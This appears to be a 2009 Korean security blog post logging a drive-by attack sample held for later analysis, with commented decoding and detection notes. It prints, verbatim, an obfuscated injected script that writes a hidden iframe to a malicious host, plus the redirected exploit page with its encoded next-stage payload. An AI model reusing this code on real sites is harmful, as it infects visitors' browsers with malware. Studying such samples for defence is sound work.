정보보호 (Security)

공격 코드 분석 대기 등록

by 날으는물고기 2009. 4. 7.

공격 코드 분석 대기 등록

페이지 소스에 삽입된 코드

<!--
  Injected script sample, kept exactly as captured so it can still be matched against other copies.

  What the visible code does:
  * c32aee72b6q49cd039646b4c(s) looks up parseInt through eval('pa'+'rseInt'), so the
    built-in name never appears as one literal token, and parses s in base 16.
  * q49cd03964893e(s) walks s two characters at a time, converts each pair with the
    function above plus String.fromCharCode, and returns the concatenated result.
  * v39 is the empty string. Concatenating it changes nothing at run time; it only
    breaks the hex literal into fragments so the full hex text is not contiguous
    in the page source.
  * The decoded string is handed directly to document.write, so the markup it holds
    is parsed in the context of the page that carries this snippet.

  What the hex literal contains (readable by decoding the pairs by hand):
  * Layer 1 is a script element that checks a flag named myia, calls
    document.write(unescape(...)) on a percent-escaped string, then sets myia to true.
  * Layer 2 (the percent-escaped string) is an iframe with width=524, height=3 and
    style visibility:hidden, whose src is the clarafin.info/traff/index.php? URL that
    this page records in the GET line below, followed by a Math.random based suffix.

  Review / detection notes: the combination to look for in served pages is a built-in
  resolved through eval on a split string, a long hex literal interleaved with an
  empty variable, and document.write of the decoded value. The presence of this block
  in a page the site owner did not author means the page source itself was modified;
  removing the snippet without finding how it was written there leaves the cause open.
-->
<script>function c32aee72b6q49cd039646b4c(q49cd0396471d2){ var q49cd03964799d=16; return (eval('pa'+'rseInt')(q49cd0396471d2,q49cd03964799d));}function q49cd03964893e(q49cd039649299){ var q49cd03964a87a=2; var q49cd0396498de='';q49cd03964b821=String['fromCharCode'];for(q49cd03964a0ad=0;q49cd03964a0ad<q49cd039649299.length;q49cd03964a0ad+=q49cd03964a87a){ q49cd0396498de+=(q49cd03964b821(c32aee72b6q49cd039646b4c(q49cd039649299.substr(q49cd03964a0ad,q49cd03964a87a))));}return q49cd0396498de;} var v39='';var q49cd03964bfec='3C7'+v39+'3637'+v39+'2697'+v39+'07'+v39+'43E696628216D7'+v39+'96961297'+v39+'B646F637'+v39+'56D656E7'+v39+'42E7'+v39+'7'+v39+'7'+v39+'2697'+v39+'465287'+v39+'56E657'+v39+'363617'+v39+'065282027'+v39+'2533632536392536362537'+v39+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+v39+'332537'+v39+'32253633253364253237'+v39+'2536382537'+v39+'342537'+v39+'342537'+v39+'302533612532662532662536332536632536312537'+v39+'322536312536362536392536652532652536392536652536362536662532662537'+v39+'342537'+v39+'322536312536362536362532662536392536652536342536352537'+v39+'382532652537'+v39+'302536382537'+v39+'30253366253237'+v39+'2532622534642536312537'+v39+'342536382532652537'+v39+'322536662537'+v39+'352536652536342532382534642536312537'+v39+'342536382532652537'+v39+'32253631253665253634253666253664253238253239253261253331253335253337'+v39+'253332253239253262253237'+v39+'253632253337'+v39+'253339253634253336253334253336253633253336253339253237'+v39+'2532302537'+v39+'37'+v39+'2536392536342537'+v39+'34253638253364253335253332253334253230253638253635253639253637'+v39+'2536382537'+v39+'342533642533332532302537'+v39+'332537'+v39+'342537'+v39+'39253663253635253364253237'+v39+'2537'+v39+'362536392537'+v39+'332536392536322536392536632536392537'+v39+'342537'+v39+'39253361253638253639253634253634253635253665253237'+v39+'2533652533632532662536392536362537'+v39+'3225363125366425363525336527'+v39+'29293B7'+v39+'D7'+v39+'6617'+v39+'2206D7'+v39
+'969613D7'+v39+'47'+v39+'27'+v39+'5653B3C2F7'+v39+'3637'+v39+'2697'+v39+'07'+v39+'43E';document.write(q49cd03964893e(q49cd03964bfec));</script>

GET http://clarafin.info/traff/index.php? HTTP/1.1

Redirect : http://letomerin.cn/x0/index.php

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251">
</HEAD>
<!--
  Response body recorded for the redirect target listed above, kept exactly as captured.

  Static markup:
  * The object tag creates a COM object by CLSID under the id "xmltarget".
    NOTE(review): the CLSID looks like an MSXML XMLHTTP class; confirm it against a
    reference before relying on that identification.
  * Two empty divs, "pdfplace" and "xmlplace", are declared. Presumably the decoded
    script fills them; that step is not visible on this page.

  ddd(x), as written:
  * Processes x in chunks of at most 1024 input characters (b=1024) and calls
    document.write once per chunk with the decoded text r.
  * Each input character is mapped through table t at index (char code minus 33)
    and OR-ed into accumulator w at bit offset s.
  * When s is 0 the function only sets s to 6 and emits nothing. Otherwise it emits
    one character, 26 XOR (w AND 255), shifts w right by 8 and lowers s by 2.
    The net effect is three output characters for every four input characters.
  * p, s and w are not reset between chunks, so decoding state carries across them.

  The argument of the ddd call is the encoded next stage. Its decoded content is not
  reproduced on this page, so nothing here states what it does; the author's note
  below records only the observed outcome.

  The line breaks inside the string literal are presumably wrapping artifacts from
  the capture, since a raw newline inside a double-quoted JavaScript string would be
  a syntax error. Rejoin the lines before attempting any offline decoding, and do
  that in an isolated analysis environment that replaces document.write with a
  logger rather than in a browser.
-->
<BODY><object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object><div id="pdfplace"></div><div id="xmlplace"></div><script language=JavaScript>function ddd(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(72,0,65,0,5,60,0,0,0,0,42,0,61,23,0,22,66,64,44,48,0,27,51,38,21,0,0,0,0,0,0,47,13,32,63,10,11,40,9,56,33,54,12,1,70,26,15,4,3,2,19,17,69,37,36,58,29,7,0,0,0,6,18,0,50,53,24,14,41,30,68,67,8,20,34,16,25,35,43,49,28,57,39,62,59,55,45,46,71,52,0,0,0,31,0);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-33])<<s;if(s){r+=String.fromCharCode(26^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}ddd("8W0fFAsNxTa%l4v6zVs679ZYXiJYJG7KIYLP3wZNXW8qCmsYr9s~CYa6z-.NrwsNCGQdC&8EeH_DC&8EeH_DC&8D&-ZfC&0De&RfC&^E3WviC&8i+BviC&8i+FaDC&J~&V_DHFSK.5LdC&J~FH_DC&J~HpvfC&J~kFaEC&^~&-.fC&^~&pZ~C&8iHbR~C&8~&ra~C&J~&-Z~C&^Ex&Z~C&J~e3Z~C&Ji&pkEC&8EF4.DC&Ji&pkEC&^EC-.EC&J~&e_DC&J~&-ZfHFSK.5LdC&^Ex&Z~C&^fnF_DC&^Eoi_EC&J~o3vDC&8DwF_DC&J~&waDC&J~&-Z~C&JfupREC&^fn&ZfC&0Ewi_EC&^E@3aDC&8Dw&vDC&J~&wR~C&J~&-Z~C&JfupREC&^fn&.EHFSK.5LdC&0fuG_EC&JD+&R~C&8DwBk~C&J~&ek~C&J~&-Z~C&JfupREC&^fn&.DC&8D+i_EC&8D&IaDC&8DwiR~C&J~&VRfC&J~&-Z~C&JfupREC&^fn4Z~C&^DCG_EC&8DuAREHFSK.5LdC&8Dw&_EC&J~&IaiC&J~&-Z~C&JfupREC&Jf&pZfC&8~w4R~C&JiuI_fC&^E33aEC&^~w3vfC&J~kFREC&J~&-v~C&^fo&Z~C&JiupREC&^ExWZfC&J~HwvfC&J~CGaEHFSK.5LdC&^ExBZEC&^~wBvfC&8DwBviC&J~&pkEC&J~&-Z~C&8iwBZ~C&^~@HviC&Ji&VsDC&0EkF_EC&J~&-Z~C&^E3&Z~C&^~e3vfC&^DupkEC&^D&p_fC&^E3BZ~C&0f&wvfHFSK.5LdC&JD+i_EC&J~&-Z~C&^f&-Z~C&JfupkEC&8i@4ZfC&^f3&s~C&^fupkEC&8Dw4.EC&J~&Ga~C&J~&-Z~C&Jfu-.fC&^DkWZ~C&^fe&Z~C&0foKaDC&^DkiafC&J~HwZ~HFSK.5LdC&8iuA_EC&J~&-Z~C&JiuwkDC&^ExWZ~C&J~e3vfC&J~CGaEC&^ExBZEC&^~wBvfC&Jf&e_EC&J~&-Z~C&8i@&Z~C&^fw&siC&Jfu-.fC&8~rVZfC&^frVkEC&JD+B.fHFSK.5LdC&0f&AafC&^frIZ~C&JfupkEC&8i@4.DC&^f3&vfC&^fupkEC&8Dw4.EC&J~&V.fC&J~&-Z~C&J~&GaEC&JiuwkDC&^ExWZ~C&J~w3vfC&J~tGaEC&^ExBZEC&^~wBvfHFSK.5LdC&^~&e_EC&J~&-Z~C&8i@&Z~C&^Ex3kDC&^~&wvfC&J~CGaEC&^ExBZEC&^~wBvfC&J~&e_EC&J~&-Z~C&JfC-Z~C&^ftIsEC&8DC-.
fC&8DC-.fC&8DC-.fC&8DC-.fHFSK.5LdC&8De4_fC&^f@&ZfC&^ExB.fC&8DtVaEC&^ftwkiC&8D&wkDC&^ExBvfC&^ExF_DC&J~wKRDC&^fF4kEC&^fn&.DC&JirpkEC&^ExH.DC&^~oKRfC&J~rA_EC&^fn3_fHFSK.5LdC&Jin4kEC&J~rVZ~C&8~rw_fC&Jf3BREC&8EF3v~C&^Dr-.fC&8~rIviC&J~+3aiC&^~&-aDC&JDtrvEC&J~wKRfC&^DoBa~C&J~r-ZDC&Jf&wk~C&JDCekEC&JDoHsEHFSK.5LdC&JiuIvDC&^f@FafC&8Dx4kEC&^f@4kEC&J~rVZfC&8inWRDC&J~e4kEC&^Ex3sEC&^~eBvEC&0DF&.fC&J~HpkEC&J~rpkEC&^foBafC&^DtIZDC&J~&-.EC&JDHe_EHFSK.5LdC&JD+3aDC&^fuwkDC&JfeBs~C&Jf+3ZDC&J~&wvDC&0Ex4kiC&0E+zkEC&^DqVa0C&^EmIR.C&0Ex4aEC&^EfpR.C&0EF4aEC&^E~paiC&^EeBa.C&^Dqpa.C&0D+zkiC&^E@BR.C&^E@zkiC&0E+Ba.C&0E+4kiHKSi.5L6uI8dee^NuA8dsF76z-.NrwsNCGQdC&8DueafC&8DueafHKSi.5I~beScXW8NFwvcXP7GXW8NFwvcIF7mXz8q7mv~aW8NFwvczcv~zbs6aenGXFkctekD+FaKIqLPv-vYbIJcXqkdz-.6X3%NFwvcaKSi.5L~bI8K7e7GXF_iXKsd8F7D+F_iXK.KpKScXqv~v9ZNn%zqZe7GXW8NFwvcXPndeGv~Jm.fbrv~IF7m.5I~bVv6v-ZYxTS~CrJ.J-vYCTs6cAJjtGQdkYsY+mvfr-Zd7l7qzTv~FGVS.mVdsFQd8iz90e7jfYajWcklWc_0WcadLVV.6rz0Lmaqvw.~CeS_iVbGar86+L_Ab4Sdkeaf+3.i&Wnc+3sDu%RACGJfve8YCTSfbYZGZYPG8jS0Wc_ARTkGbiz90TkGGez0jen.6rz0GIj0sW7jXHb0dw%.0rbGmen.6rz0q9%_.wVS6VzG_rz90TkGRYV9XKV.sK%G8jnl.m%G8WW_6TVdfwVS6VP_mY_dSen.6rz0qmV.sWVdfwVS6p99iYb0dw9_siVS.m%G8jS_Dw%9Wc_AGez0jTRdIqLPe-s6dAvYC9v6xGQdeTsK7BnAXWkD+KSi.5pm.5L~@T.fxA.YzenNtpsK7PJ%lH^NneSc.5L6uI8dbIZqXqkdz-8YJ%a%ljZf4e7GXlv~we70rrJq3-sl9IZqCVs6aB70rI0YDr%.zFW.qI7KIqLP7psda3SYHLvKXP0YHLsdsFQYCb8d6Vs67pJ~R9%f4-.fxGQdDr%.zFW~&VV6FmZd7Pam.5pq&enKbIZq7FSct9.f@Yv~zr^A--s6~mv~v-ZYxIbcSrsKHF8~&e8YuVv~HKQA7TZYCI8jdYV9XqkdHca~vIv~teS67rs6aY_Oo&kD-FnqCA.~arJG-3aE+zndeI0fszSN+m.A+rZ~zF8~&bndxA8NCY_Oue8NJA.furJqbT.A+rZ~-lkGb&vYH-s~WBSisYLPseSfur0faG7~7FSc.5I~bVv6v-ZYxTS~CrJ.J-vYCTs6cAJjtGQd+rZ~+mvfr-Zd7l7qzTv~FGVS.mVdsFQd8&vYH-s~XzJqtr8qsz7D@F_OXiv~7bsqxY_Oo&kD-FSNFVvG-W8NJ9nNtpZA+rZ~-Fn6neJ~sz7f+e8Y7VvfxA.Yz9nNtp.OWc_ACYZfCrZGHPa%lqJ%lWJ~xrzqv-.Y@r8KHiJYJG7KHcndoFkD7Pa%lqJ%l4v6zVs679ZYXW^YaKSc.5I6FA0c.5LNCrJGz-.6X39fxAZ6CGj9HLv~rr8KHW^Y+p06zWPYue0Na9s6X4zqCbJ~FeS0bTs6F9sYz3Rd7Pa%l4JfFe7fFIvqxIJfFA0T&AsYCe7GXznqxr8NBjSAJ-s6bYv
~FAZYzWZYbi8Db&scCTnNae0OIqLP3wZNXHv~er8dsFSOmL_ADI0Y-IJfveQ.7mv~e9S9@r8Yb9.qX&Vc+IJ~eV0AwwZfz&scCbSi.5I~bVv6v-ZYxTS6FAs6CGQd8jZf4-.fxeSfJw.NeAs~szSfJVJqtLR.+&VEFH%E+qSD3i_0v3aDfeaA6rVioqnD+3VDmAkDfVVifA_OXKs~sz7fxrJfr%.OWc_AbIZqCVs6WB7KIqLPur86uV.qzWPYue0Na9s6Dws6ae7GX3ZNHAs6FwZNn9P~7mv~IqLPe-s6dAvYC9v6xGSOwAZYt9.6zc.Yrws679ZYXqkdHcs~ue^ibjQd-cSD+FkD7Pa%l3s6xw.fpTS0bYsNF-.Ne-s~Dws6ae7GXHv~er0i.5pfxrJfr%ZADIJqzr0_zwsNeG.YxG7fFIvqxIJfFA0T&AsYCmn~CV867Pa%lq0fur0faG7~7PJm.5pm.5INtpsK7Pa%lc_AeVZN7e86WqLP")</script>

ActiveX 설치 및 바이러스 탐지

상세 분석은 차후 진행 예정.
